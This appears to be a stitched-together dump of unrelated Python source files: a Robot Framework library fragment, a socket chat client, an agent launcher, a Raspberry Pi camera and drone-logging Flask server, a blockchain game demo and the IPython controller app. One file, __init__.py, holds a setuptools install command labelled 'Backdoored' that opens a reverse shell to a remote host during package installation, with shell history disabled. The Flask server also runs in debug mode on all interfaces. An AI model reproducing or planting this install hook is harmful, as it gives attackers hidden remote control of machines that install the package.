error.ROBOT_CONTINUE_ON_FAILURE = False
raise error
def release_value_set(self):
"""
Release a reserved value set so that other executions can use it also.
[https://pabot.org/PabotLib.html?ref=log#release-value-set|Open online docs.]
"""
self._valueset = None
self._setname = None
self._run_with_lib('release_value_set', self._my_id)
def disable_value_set(self):
"""
Disable a reserved value set.
[https://pabot.org/PabotLib.html?ref=log#disable-value-set|Open online docs.]
"""
self._valueset = None
self._run_with_lib('disable_value_set', self._setname, self._my_id)
self._setname = None
# Module import will give a bad error message in log file
# Workaround: expose PabotLib also as pabotlib
pabotlib = PabotLib
if __name__ == '__main__':
import sys
RobotRemoteServer(_PabotLib(sys.argv[1]), host=sys.argv[2],
port=sys.argv[3], allow_stop=True)
|
client.py | #client
import socket
from threading import Thread
def send():
while True:
message = input()
conn.send(message.encode('utf-8'))
def get():
while True:
data = conn.recv(9988).decode('utf-8')
print(data)
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(('127.0.0.1', 10203))
Thread(target=send).start()
Thread(target=get).start()
|
launcher.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of multiple AEA configs launcher."""
import logging
import multiprocessing
from asyncio.events import AbstractEventLoop
from concurrent.futures.process import BrokenProcessPool
from multiprocessing.synchronize import Event
from os import PathLike
from threading import Thread
from typing import Any, Callable, Dict, Optional, Sequence, Tuple, Type, Union
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.exceptions import AEAException
from aea.helpers.base import cd
from aea.helpers.multiple_executor import (
AbstractExecutorTask,
AbstractMultipleExecutor,
AbstractMultipleRunner,
AbstractMultiprocessExecutorTask,
AsyncExecutor,
ExecutorExceptionPolicies,
ProcessExecutor,
TaskAwaitable,
ThreadExecutor,
)
from aea.runtime import AsyncRuntime
_default_logger = logging.getLogger(__name__)
def load_agent(agent_dir: Union[PathLike, str]) -> AEA:
"""
Load AEA from directory.
:param agent_dir: agent configuration directory
:return: AEA instance
"""
with cd(agent_dir):
return AEABuilder.from_aea_project(".").build()
def _set_logger(
log_level: Optional[str],
): # pragma: nocover # used in spawned process and pytest does not see this code
from aea.cli.utils.loggers import ( # pylint: disable=import-outside-toplevel
default_logging_config,
)
logger_ = logging.getLogger("aea")
logger_ = default_logging_config(logger_)
if log_level is not None:
level = logging.getLevelName(log_level)
logger_.setLevel(level)
def _run_agent(
agent_dir: Union[PathLike, str], stop_event: Event, log_level: Optional[str] = None
) -> None:
"""
Load and run agent in a dedicated process.
:param agent_dir: agent configuration directory
:param stop_event: multithreading Event to stop agent run.
:param log_level: debug level applied for AEA in subprocess
:return: None
"""
import asyncio # pylint: disable=import-outside-toplevel
import select # pylint: disable=import-outside-toplevel
import selectors # pylint: disable=import-outside-toplevel
if hasattr(select, "kqueue"): # pragma: nocover # cause platform specific
selector = selectors.SelectSelector()
loop = asyncio.SelectorEventLoop(selector) # type: ignore
asyncio.set_event_loop(loop)
_set_logger(log_level=log_level)
agent = load_agent(agent_dir)
def stop_event_thread():
try:
stop_event.wait()
except (KeyboardInterrupt, EOFError, BrokenPipeError) as e: # pragma: nocover
_default_logger.error(
f"Exception raised in stop_event_thread {e} {type(e)}. Skip it, looks process is closed."
)
finally:
_default_logger.debug("_run_agent: stop event raised. call agent.stop")
agent.runtime.stop()
Thread(target=stop_event_thread, daemon=True).start()
try:
agent.start()
except KeyboardInterrupt: # pragma: nocover
_default_logger.debug("_run_agent: keyboard interrupt")
except BaseException as e: # pragma: nocover
_default_logger.exception("exception in _run_agent")
exc = AEAException(f"Raised {type(e)}({e})")
exc.__traceback__ = e.__traceback__
raise exc
finally:
_default_logger.debug("_run_agent: call agent.stop")
agent.stop()
class AEADirTask(AbstractExecutorTask):
"""Task to run agent from agent configuration directory."""
def __init__(self, agent_dir: Union[PathLike, str]) -> None:
"""
Init aea config dir task.
:param agent_dir: direcory with aea config.
"""
self._agent_dir = agent_dir
self._agent: AEA = load_agent(self._agent_dir)
super().__init__()
def start(self) -> None:
"""Start task."""
self._agent.start()
def stop(self):
"""Stop task."""
if not self._agent: # pragma: nocover
raise ValueError("Task was not started!")
self._agent.stop()
def create_async_task(self, loop: AbstractEventLoop) -> TaskAwaitable:
"""Return asyncio Task for task run in asyncio loop."""
self._agent.runtime.set_loop(loop)
if not isinstance(self._agent.runtime, AsyncRuntime): # pragma: nocover
raise ValueError(
"Agent runtime is not async compatible. Please use runtime_mode=async"
)
return loop.create_task(self._agent.runtime.start_and_wait_completed())
@property
def id(self) -> Union[PathLike, str]:
"""Return agent_dir."""
return self._agent_dir
class AEADirMultiprocessTask(AbstractMultiprocessExecutorTask):
"""
Task to run agent from agent configuration directory.
Version for multiprocess executor mode.
"""
def __init__(
self, agent_dir: Union[PathLike, str], log_level: Optional[str] = None
):
"""
Init aea config dir task.
:param agent_dir: direcory with aea config.
:param log_level: debug level applied for AEA in subprocess
"""
self._agent_dir = agent_dir
self._manager = multiprocessing.Manager()
self._stop_event = self._manager.Event()
self._log_level = log_level
super().__init__()
def start(self) -> Tuple[Callable, Sequence[Any]]:
"""Return function and arguments to call within subprocess."""
return (_run_agent, (self._agent_dir, self._stop_event, self._log_level))
def stop(self):
"""Stop task."""
if self._future.done():
_default_logger.debug("Stop called, but task is already done.")
return
try:
self._stop_event.set()
except (FileNotFoundError, BrokenPipeError, EOFError) as e: # pragma: nocover
_default_logger.error(
f"Exception raised in task.stop {e} {type(e)}. Skip it, looks process is closed."
)
@property
def id(self) -> Union[PathLike, str]:
"""Return agent_dir."""
return self._agent_dir
@property
def failed(self) -> bool:
"""
Return was exception failed or not.
If it's running it's not failed.
:rerurn: bool
"""
if not self._future:
return False
if (
self._future.done()
and self._future.exception()
and isinstance(self._future.exception(), BrokenProcessPool)
): # pragma: nocover
return False
return super().failed
class AEALauncher(AbstractMultipleRunner):
"""Run multiple AEA instances."""
SUPPORTED_MODES: Dict[str, Type[AbstractMultipleExecutor]] = {
"threaded": ThreadExecutor,
"async": AsyncExecutor,
"multiprocess": ProcessExecutor,
}
def __init__(
self,
agent_dirs: Sequence[Union[PathLike, str]],
mode: str,
fail_policy: ExecutorExceptionPolicies = ExecutorExceptionPolicies.propagate,
log_level: Optional[str] = None,
) -> None:
"""
Init AEARunner.
:param agent_dirs: sequence of AEA config directories.
:param mode: executor name to use.
:param fail_policy: one of ExecutorExceptionPolicies to be used with Executor
:param log_level: debug level applied for AEA in subprocesses
"""
self._agent_dirs = agent_dirs
self._log_level = log_level
super().__init__(mode=mode, fail_policy=fail_policy)
def _make_tasks(self) -> Sequence[AbstractExecutorTask]:
"""Make tasks to run with executor."""
if self._mode == "multiprocess":
return [
AEADirMultiprocessTask(agent_dir, log_level=self._log_level)
for agent_dir in self._agent_dirs
]
return [AEADirTask(agent_dir) for agent_dir in self._agent_dirs]
|
__init__.py | import multiprocessing
import time
import os
import pty
import socket
from setuptools.command.install import install as base
def shell(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv('HISTFILE', '/dev/null')
pty.spawn('/bin/bash')
s.close()
def multi(host, port):
cc = multiprocessing.Process(name='shell', target=shell, args=(host, port))
cc.start()
class install(base):
"""
Backdoored install function that spawns a reverse shell
"""
user_options = base.user_options + [
('host=', None, "Remote host to connect to"),
('port=', None, "Remote port to connect to")
]
def initialize_options(self):
base.initialize_options(self)
self.host = None
self.port = None
def run(self):
if self.host and self.port:
mult = multiprocessing.Process(name='multi', target=multi, args=(self.host, self.port))
mult.daemon = False
mult.start()
time.sleep(.5) # Give it just long enought to start
mult.terminate()
base.run(self)
|
OSAVC_web_server.py | from doctest import master
from flask import Flask, render_template,request, redirect, url_for
import time, os, shutil
from picamera import PiCamera
from datetime import datetime, timedelta
from threading import Thread
from pymavlink import mavutil
import csv
import sys
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
MAVstatus = 'Disconnected'
Datalogging = False
def connectMAV():
global master
global MAVstatus
global btn1
# Create the connection
# Need to provide the serial port and baudrate
master = mavutil.mavlink_connection("/dev/ttyUSB0", baud=115200) # usb on windows
# find the OSAVC controller
master.wait_heartbeat(timeout = 5)
if(MAVstatus == 'Disconnected'):
if master.target_system == 0:
print('No system detected!')
MAVstatus = 'Timeout'
else:
print('target_system {}, target component {} \n'.format(master.target_system,master.target_component))
btn1 = 'h'
MAVstatus = 'Connected'
print('connectMAV thread stopped')
def MAVlogging():
global master
global MAVstatus
global btn1
t='{:%Y%m%d-%H%M%S}'.format(datetime.now())
csv_file = '/mnt/usb/logfiles/log_' + t + '.csv'
# first find all the incoming messages:
msgs_dict = {}
start_time = time.time()
end_time = 5
while time.time() - start_time < end_time:
msg = master.recv_match(blocking=True)
if not msg:
MAVstatus = 'No Data Found!'
if msg.get_type() == "BAD_DATA":
pass
""" if mavutil.all_printable(msg.data):
sys.stdout.write(msg.data)
sys.stdout.flush() """
else:
#Message is valid
# Use the attribute
msgs_dict.update(msg.to_dict())
# Put all keys for all the incoming messages into the headers list
headers = list(msgs_dict)
print(headers)
with open(csv_file, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=headers)
writer.writeheader()
start_time = time.time()
logging_time = 20
# currently we log for a specified period of time
while Datalogging == True and time.time() - start_time < logging_time:
msg = master.recv_match(blocking = True)
if not msg:
MAVstatus = 'No Data Found!'
if msg.get_type() == "BAD_DATA":
if mavutil.all_printable(msg.data):
pass
else:
# add msg to the msgs_dict
msgs_dict.update(msg.to_dict())
# and write it to the file
writer.writerow(msgs_dict)
# finish up:
master.close()
print('Exiting datalogging script')
def timelapse(): # continuous shooting
cam = PiCamera()
cam.resolution = (1640,922)
for filename in enumerate(cam.capture_continuous('/mnt/usb/images/img{timestamp:%Y%m%d-%H%M%S}.jpg')):
print('snap taken')
print(btn1,btn2)
print(filename)
#shutil.copyfile(filename,'/mnt/usb/images/filename')
#shutil.copyfile(filename,'/home/pi/Flask/static/latest.jpg')
if btn1 != 's':
break
cam.close()
print('timelapse thread stopped')
def video(): # record a video
cam = PiCamera()
t='{:%Y%m%d-%H%M%S}'.format(datetime.now())
cam.resolution = (640,480)
cam.start_recording('/mnt/usb/video/vid'+t+'.h264')
while btn1 == 'v':
print(btn1,btn2)
pass
cam.stop_recording()
cam.close()
print('video thread stopped')
def snapstart(): # take pictures on demand
cam = PiCamera()
cam.resolution = (1640,922)
print('entered snapshot mode')
global btn2
while btn1 == 'q':
time.sleep(0.1)
if btn2 == 'a':
print('taken snap: btn2 =' + btn2)
t='{:%Y%m%d-%H%M%S}'.format(datetime.now())
filename = '/mnt/usb/images/img'+t+'.jpg'
cam.capture(filename)
shutil.copyfile(filename,'/mnt/usb/latest/latest.jpg')
shutil.copyfile(filename,'/home/pi/Flask/static/latest.jpg')
btn2 = 'o'
print('btn2 =' + btn2)
cam.close()
print('exiting snaphot mode')
# we are able to make two different requests on our webpage
# GET = we just type in the url
# POST = some sort of form submission like a button
@app.route('/', methods = ['POST','GET'])
def hello_world():
status = 'off'
global btn1
btn1 = 'o'
global btn2
btn2 = 'o'
message = 'All good'
global MAVstatus
global Datalogging
# if we make a post request on the webpage aka press button then do stuff
if request.method == 'POST':
# if we press the turn on button
if request.form['submit'] == 'Video':
print('BP: Recording video')
status = 'video'
btn1 = 'v'
t2 = Thread(target=video)
t2.start()
message = 'All good'
elif request.form['submit'] == 'Video Off':
print('BP: Video off')
status = 'Idle'
btn1 = 'o'
message = 'All good'
elif request.form['submit'] == 'Connect MAV':
print('Trying to connect')
if MAVstatus == 'Disconnected':
status = 'Connecting to MAV'
btn1 = 'h'
t4 = Thread(target=connectMAV)
t4.start()
elif request.form['submit'] == 'Start logging':
Datalogging = True
btn1 = 'datalog'
t5 = Thread(target=MAVlogging)
t5.start()
elif request.form['submit'] == 'Stop logging':
Datalogging = False
btn1 = 'o'
elif request.form['submit'] == 'Stills':
print('BP: Recording stills')
btn1 = 's'
t1 = Thread(target=timelapse)
t1.start()
status = 'stills'
message = 'All good'
elif request.form['submit'] == 'Stills Off':
print('BP: stills off')
status = 'Idle'
btn1 = 'o'
message = 'All good'
elif request.form['submit'] == 'QuickSnap':
print('BP: QuickSnap')
status = 'Ready to snap'
btn1 = 'q'
t3 = Thread(target=snapstart)
t3.start()
message = 'All good'
elif request.form['submit'] == 'QuickSnap Off':
print('BP:QuickSnap off')
status = 'Idle'
btn1 = 'o'
message = 'All good'
elif request.form['submit'] == 'Take':
print('BP:Take')
status = 'Snapshot mode'
btn1 = 'q'
btn2 = 'a'
message = 'All good'
elif request.form['submit'] == '_Take_':
print('BP:Take error')
status = 'Error'
message = 'Enable QuickSnap first'
btn1 = 'o'
else:
pass
# temp = round(bme280.get_temperature(),2) # temperature
temp = 0
# press = int(bme280.get_pressure()) # pressure
press = 0
# lux = ltr559.get_lux() # light levels
lux = 0
df = os.statvfs('/') # check if we're running out of disk space
df_size = df.f_frsize * df.f_blocks
df_avail = df.f_frsize * df.f_bfree
df_pc = round((100 * df_avail/df_size),1)
print(btn1, btn2)
# the default page to display will be our template with our template variables
return render_template('index2.html', MAVstatus= MAVstatus, message= message, status=status, temp=temp, press=press, lux=lux, df_pc=df_pc, btn1 = btn1)
if __name__ == "__main__":
# let's launch our webpage!
# do 0.0.0.0 so that we can log into this webpage
# using another computer on the same network later
# specify port 80 rather than default 5000
app.run(host='0.0.0.0',port=5000,debug=True)
|
index.py | # flake8: noqa
import random
from threading import Thread
from reach_rpc import mk_rpc
def main():
rpc, rpc_callbacks = mk_rpc()
starting_balance = rpc('/stdlib/parseCurrency', 100)
acc_alice = rpc('/stdlib/newTestAccount', starting_balance)
acc_bob = rpc('/stdlib/newTestAccount', starting_balance)
def fmt(x):
return rpc('/stdlib/formatCurrency', x, 4)
def get_balance(w):
return fmt(rpc('/stdlib/balanceOf', w))
before_alice = get_balance(acc_alice)
before_bob = get_balance(acc_bob)
ctc_alice = rpc('/acc/contract', acc_alice)
HAND = ['Rock', 'Paper', 'Scissors']
OUTCOME = ['Bob wins', 'Draw', 'Alice wins']
def player(who):
def getHand():
hand = random.randint(0, 2)
print('%s played %s' % (who, HAND[hand]))
return hand
def informTimeout():
print('%s observed a timeout' % who)
def seeOutcome(n):
print('%s saw outcome %s'
% (who, OUTCOME[rpc('/stdlib/bigNumberToNumber', n)]))
return {'stdlib.hasRandom': True,
'getHand': getHand,
'informTimeout': informTimeout,
'seeOutcome': seeOutcome,
}
def play_alice():
rpc_callbacks(
'/backend/Alice',
ctc_alice,
dict(wager=rpc('/stdlib/parseCurrency', 5), deadline=10, **player('Alice')))
alice = Thread(target=play_alice)
alice.start()
def play_bob():
def acceptWager(amt):
print('Bob accepts the wager of %s' % fmt(amt))
ctc_bob = rpc('/acc/contract', acc_bob, rpc('/ctc/getInfo', ctc_alice))
rpc_callbacks(
'/backend/Bob',
ctc_bob,
dict(acceptWager=acceptWager, **player('Bob')))
rpc('/forget/ctc', ctc_bob)
bob = Thread(target=play_bob)
bob.start()
alice.join()
bob.join()
after_alice = get_balance(acc_alice)
after_bob = get_balance(acc_bob)
print('Alice went from %s to %s' % (before_alice, after_alice))
print(' Bob went from %s to %s' % (before_bob, after_bob))
rpc('/forget/acc', acc_alice, acc_bob)
rpc('/forget/ctc', ctc_alice)
if __name__ == '__main__':
main()
|
ipcontrollerapp.py | #!/usr/bin/env python
# encoding: utf-8
"""
The IPython controller application.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import with_statement
import json
import os
import stat
import sys
from multiprocessing import Process
from signal import signal, SIGINT, SIGABRT, SIGTERM
import socket
import zmq
from zmq.devices import ProcessMonitoredQueue
from zmq.log.handlers import PUBHandler
from IPython.core.profiledir import ProfileDir
from ipyparallel.apps.baseapp import (
BaseParallelApplication,
base_aliases,
base_flags,
catch_config_error,
)
from ipython_genutils.importstring import import_item
from traitlets import Unicode, Bool, List, Dict, TraitError, observe
from jupyter_client.session import (
Session, session_aliases, session_flags,
)
from ipyparallel.controller.heartmonitor import HeartMonitor
from ipyparallel.controller.hub import HubFactory
from ipyparallel.controller.scheduler import TaskScheduler,launch_scheduler
from ipyparallel.controller.dictdb import DictDB
from ipyparallel.util import disambiguate_url
# conditional import of SQLiteDB / MongoDB backend class
real_dbs = []
try:
from ipyparallel.controller.sqlitedb import SQLiteDB
except ImportError:
pass
else:
real_dbs.append(SQLiteDB)
try:
from ipyparallel.controller.mongodb import MongoDB
except ImportError:
pass
else:
real_dbs.append(MongoDB)
#-----------------------------------------------------------------------------
# Module level variables
#-----------------------------------------------------------------------------
_description = """Start the IPython controller for parallel computing.
The IPython controller provides a gateway between the IPython engines and
clients. The controller needs to be started before the engines and can be
configured using command line options or using a cluster directory. Cluster
directories contain config, log and security files and are usually located in
your ipython directory and named as "profile_name". See the `profile`
and `profile-dir` options for details.
"""
_examples = """
ipcontroller --ip=192.168.0.1 --port=1000 # listen on ip, port for engines
ipcontroller --scheme=pure # use the pure zeromq scheduler
"""
#-----------------------------------------------------------------------------
# The main application
#-----------------------------------------------------------------------------
flags = {}
flags.update(base_flags)
flags.update({
'usethreads' : ( {'IPControllerApp' : {'use_threads' : True}},
'Use threads instead of processes for the schedulers'),
'sqlitedb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.sqlitedb.SQLiteDB'}},
'use the SQLiteDB backend'),
'mongodb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.mongodb.MongoDB'}},
'use the MongoDB backend'),
'dictdb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.dictdb.DictDB'}},
'use the in-memory DictDB backend'),
'nodb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.dictdb.NoDB'}},
"""use dummy DB backend, which doesn't store any information.
This is the default as of IPython 0.13.
To enable delayed or repeated retrieval of results from the Hub,
select one of the true db backends.
"""),
'reuse' : ({'IPControllerApp' : {'reuse_files' : True}},
'reuse existing json connection files'),
'restore' : ({'IPControllerApp' : {'restore_engines' : True, 'reuse_files' : True}},
'Attempt to restore engines from a JSON file. '
'For use when resuming a crashed controller'),
})
flags.update(session_flags)
aliases = dict(
ssh = 'IPControllerApp.ssh_server',
enginessh = 'IPControllerApp.engine_ssh_server',
location = 'IPControllerApp.location',
url = 'HubFactory.url',
ip = 'HubFactory.ip',
transport = 'HubFactory.transport',
port = 'HubFactory.regport',
ping = 'HeartMonitor.period',
scheme = 'TaskScheduler.scheme_name',
hwm = 'TaskScheduler.hwm',
)
aliases.update(base_aliases)
aliases.update(session_aliases)
class IPControllerApp(BaseParallelApplication):
name = u'ipcontroller'
description = _description
examples = _examples
classes = [ProfileDir, Session, HubFactory, TaskScheduler, HeartMonitor, DictDB] + real_dbs
# change default to True
auto_create = Bool(True, config=True,
help="""Whether to create profile dir if it doesn't exist.""")
reuse_files = Bool(False, config=True,
help="""Whether to reuse existing json connection files.
If False, connection files will be removed on a clean exit.
"""
)
restore_engines = Bool(False, config=True,
help="""Reload engine state from JSON file
"""
)
ssh_server = Unicode(u'', config=True,
help="""ssh url for clients to use when connecting to the Controller
processes. It should be of the form: [user@]server[:port]. The
Controller's listening addresses must be accessible from the ssh server""",
)
engine_ssh_server = Unicode(u'', config=True,
help="""ssh url for engines to use when connecting to the Controller
processes. It should be of the form: [user@]server[:port]. The
Controller's listening addresses must be accessible from the ssh server""",
)
location = Unicode(socket.gethostname(), config=True,
help="""The external IP or domain name of the Controller, used for disambiguating
engine and client connections.""",
)
import_statements = List([], config=True,
help="import statements to be run at startup. Necessary in some environments"
)
use_threads = Bool(False, config=True,
help='Use threads instead of processes for the schedulers',
)
engine_json_file = Unicode('ipcontroller-engine.json', config=True,
help="JSON filename where engine connection info will be stored.")
client_json_file = Unicode('ipcontroller-client.json', config=True,
help="JSON filename where client connection info will be stored.")
@observe('cluster_id')
def _cluster_id_changed(self, change):
super(IPControllerApp, self)._cluster_id_changed(change)
self.engine_json_file = "%s-engine.json" % self.name
self.client_json_file = "%s-client.json" % self.name
# internal
children = List()
mq_class = Unicode('zmq.devices.ProcessMonitoredQueue')
@observe('use_threads')
def _use_threads_changed(self, change):
self.mq_class = 'zmq.devices.{}MonitoredQueue'.format(
'Thread' if change['new'] else 'Process'
)
write_connection_files = Bool(True,
help="""Whether to write connection files to disk.
True in all cases other than runs with `reuse_files=True` *after the first*
"""
)
aliases = Dict(aliases)
flags = Dict(flags)
def save_connection_dict(self, fname, cdict):
"""save a connection dict to json file."""
fname = os.path.join(self.profile_dir.security_dir, fname)
self.log.info("writing connection info to %s", fname)
with open(fname, 'w') as f:
f.write(json.dumps(cdict, indent=2))
os.chmod(fname, stat.S_IRUSR|stat.S_IWUSR)
def load_config_from_json(self):
"""load config from existing json connector files."""
c = self.config
self.log.debug("loading config from JSON")
# load engine config
fname = os.path.join(self.profile_dir.security_dir, self.engine_json_file)
self.log.info("loading connection info from %s", fname)
with open(fname) as f:
ecfg = json.loads(f.read())
# json gives unicode, Session.key wants bytes
c.Session.key = ecfg['key'].encode('ascii')
xport,ip = ecfg['interface'].split('://')
c.HubFactory.engine_ip = ip
c.HubFactory.engine_transport = xport
self.location = ecfg['location']
if not self.engine_ssh_server:
self.engine_ssh_server = ecfg['ssh']
# load client config
fname = os.path.join(self.profile_dir.security_dir, self.client_json_file)
self.log.info("loading connection info from %s", fname)
with open(fname) as f:
ccfg = json.loads(f.read())
for key in ('key', 'registration', 'pack', 'unpack', 'signature_scheme'):
assert ccfg[key] == ecfg[key], "mismatch between engine and client info: %r" % key
xport, ip = ccfg['interface'].split('://')
c.HubFactory.client_transport = xport
c.HubFactory.client_ip = ip
if not self.ssh_server:
self.ssh_server = ccfg['ssh']
# load port config:
c.HubFactory.regport = ecfg['registration']
c.HubFactory.hb = (ecfg['hb_ping'], ecfg['hb_pong'])
c.HubFactory.control = (ccfg['control'], ecfg['control'])
c.HubFactory.mux = (ccfg['mux'], ecfg['mux'])
c.HubFactory.task = (ccfg['task'], ecfg['task'])
c.HubFactory.iopub = (ccfg['iopub'], ecfg['iopub'])
c.HubFactory.notifier_port = ccfg['notification']
def cleanup_connection_files(self):
if self.reuse_files:
self.log.debug("leaving JSON connection files for reuse")
return
self.log.debug("cleaning up JSON connection files")
for f in (self.client_json_file, self.engine_json_file):
f = os.path.join(self.profile_dir.security_dir, f)
try:
os.remove(f)
except Exception as e:
self.log.error("Failed to cleanup connection file: %s", e)
else:
self.log.debug(u"removed %s", f)
def load_secondary_config(self):
"""secondary config, loading from JSON and setting defaults"""
if self.reuse_files:
try:
self.load_config_from_json()
except (AssertionError,IOError) as e:
self.log.error("Could not load config from JSON: %s" % e)
else:
# successfully loaded config from JSON, and reuse=True
# no need to wite back the same file
self.write_connection_files = False
self.log.debug("Config changed")
self.log.debug(repr(self.config))
def init_hub(self):
c = self.config
self.do_import_statements()
try:
self.factory = HubFactory(config=c, log=self.log)
# self.start_logging()
self.factory.init_hub()
except TraitError:
raise
except Exception:
self.log.error("Couldn't construct the Controller", exc_info=True)
self.exit(1)
if self.write_connection_files:
# save to new json config files
f = self.factory
base = {
'key' : f.session.key.decode('ascii'),
'location' : self.location,
'pack' : f.session.packer,
'unpack' : f.session.unpacker,
'signature_scheme' : f.session.signature_scheme,
}
cdict = {'ssh' : self.ssh_server}
cdict.update(f.client_info)
cdict.update(base)
self.save_connection_dict(self.client_json_file, cdict)
edict = {'ssh' : self.engine_ssh_server}
edict.update(f.engine_info)
edict.update(base)
self.save_connection_dict(self.engine_json_file, edict)
fname = "engines%s.json" % self.cluster_id
self.factory.hub.engine_state_file = os.path.join(self.profile_dir.log_dir, fname)
if self.restore_engines:
self.factory.hub._load_engine_state()
# load key into config so other sessions in this process (TaskScheduler)
# have the same value
self.config.Session.key = self.factory.session.key
def init_schedulers(self):
children = self.children
mq = import_item(str(self.mq_class))
f = self.factory
ident = f.session.bsession
# disambiguate url, in case of *
monitor_url = disambiguate_url(f.monitor_url)
# maybe_inproc = 'inproc://monitor' if self.use_threads else monitor_url
# IOPub relay (in a Process)
q = mq(zmq.PUB, zmq.SUB, zmq.PUB, b'N/A',b'iopub')
q.bind_in(f.client_url('iopub'))
q.setsockopt_in(zmq.IDENTITY, ident + b"_iopub")
q.bind_out(f.engine_url('iopub'))
q.setsockopt_out(zmq.SUBSCRIBE, b'')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
# Multiplexer Queue (in a Process)
q = mq(zmq.ROUTER, zmq.ROUTER, zmq.PUB, b'in', b'out')
q.bind_in(f.client_url('mux'))
q.setsockopt_in(zmq.IDENTITY, b'mux_in')
q.bind_out(f.engine_url('mux'))
q.setsockopt_out(zmq.IDENTITY, b'mux_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
# Control Queue (in a Process)
q = mq(zmq.ROUTER, zmq.ROUTER, zmq.PUB, b'incontrol', b'outcontrol')
q.bind_in(f.client_url('control'))
q.setsockopt_in(zmq.IDENTITY, b'control_in')
q.bind_out(f.engine_url('control'))
q.setsockopt_out(zmq.IDENTITY, b'control_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
if 'TaskScheduler.scheme_name' in self.config:
scheme = self.config.TaskScheduler.scheme_name
else:
scheme = TaskScheduler.scheme_name.default_value
# Task Queue (in a Process)
if scheme == 'pure':
self.log.warn("task::using pure DEALER Task scheduler")
q = mq(zmq.ROUTER, zmq.DEALER, zmq.PUB, b'intask', b'outtask')
# q.setsockopt_out(zmq.HWM, hub.hwm)
q.bind_in(f.client_url('task'))
q.setsockopt_in(zmq.IDENTITY, b'task_in')
q.bind_out(f.engine_url('task'))
q.setsockopt_out(zmq.IDENTITY, b'task_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
elif scheme == 'none':
self.log.warn("task::using no Task scheduler")
else:
self.log.info("task::using Python %s Task scheduler"%scheme)
sargs = (f.client_url('task'), f.engine_url('task'),
monitor_url, disambiguate_url(f.client_url('notification')),
disambiguate_url(f.client_url('registration')),
)
kwargs = dict(logname='scheduler', loglevel=self.log_level,
log_url = self.log_url, config=dict(self.config))
if 'Process' in self.mq_class:
# run the Python scheduler in a Process
q = Process(target=launch_scheduler, args=sargs, kwargs=kwargs)
q.daemon=True
children.append(q)
else:
# single-threaded Controller
kwargs['in_thread'] = True
launch_scheduler(*sargs, **kwargs)
# set unlimited HWM for all relay devices
if hasattr(zmq, 'SNDHWM'):
q = children[0]
q.setsockopt_in(zmq.RCVHWM, 0)
q.setsockopt_out(zmq.SNDHWM, 0)
for q in children[1:]:
if not hasattr(q, 'setsockopt_in'):
continue
q.setsockopt_in(zmq.SNDHWM, 0)
q.setsockopt_in(zmq.RCVHWM, 0)
q.setsockopt_out(zmq.SNDHWM, 0)
q.setsockopt_out(zmq.RCVHWM, 0)
q.setsockopt_mon(zmq.SNDHWM, 0)
def terminate_children(self):
child_procs = []
for child in self.children:
if isinstance(child, ProcessMonitoredQueue):
child_procs.append(child.launcher)
elif isinstance(child, Process):
child_procs.append(child)
if child_procs:
self.log.critical("terminating children...")
for child in child_procs:
try:
child.terminate()
except OSError:
# already dead
pass
def handle_signal(self, sig, frame):
self.log.critical("Received signal %i, shutting down", sig)
self.terminate_children()
self.loop.stop()
def init_signal(self):
for sig in (SIGINT, SIGABRT, SIGTERM):
signal(sig, self.handle_signal)
def do_import_statements(self):
statements = self.import_statements
for s in statements:
try:
self.log.msg("Executing statement: '%s'" % s)
exec(s, globals(), locals())
except:
self.log.msg("Error running statement: %s" % s)
def forward_logging(self):
if self.log_url:
self.log.info("Forwarding logging to %s"%self.log_url)
context = zmq.Context.instance()
lsock = context.socket(zmq.PUB)
lsock.connect(self.log_url)
handler = PUBHandler(lsock)
handler.root_topic = 'controller'
handler.setLevel(self.log_level)
self.log.addHandler(handler)
@catch_config_error
def initialize(self, argv=None):
super(IPControllerApp, self).initialize(argv)
self.forward_logging()
self.load_secondary_config()
self.init_hub()
self.init_schedulers()
def start(self):
# Start the subprocesses:
self.factory.start()
# children must be started before signals are setup,
# otherwise signal-handling will fire multiple times
for child in self.children:
child.start()
self.init_signal()
self.write_pid_file(overwrite=True)
try:
self.factory.loop.start()
except KeyboardInterrupt:
self.log.critical("Interrupted, Exiting...\n")
finally:
self.cleanup_connection_files()
def launch_new_instance(*args, **kwargs):
"""Create and run the IPython controller"""
if sys.platform == 'win32':
# make sure we don't get called from a multiprocessing subprocess
# this can result in infinite Controllers being started on Windows
# which doesn't have a proper fork, so multiprocessing is wonky
# this only comes up when IPython has been installed using vanilla
# setuptools, and *not* distribute.
import multiprocessing
p = multiprocessing.current_process()
# the main process has name 'MainProcess'
# subprocesses will have names like 'Process-1'
if p.name != 'MainProcess':
# we are a subprocess, don't start another Controller!
return
return IPControllerApp.launch_instance(*args, **kwargs)
if __name__ == '__main__':
launch_new_instance()
|
graph.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
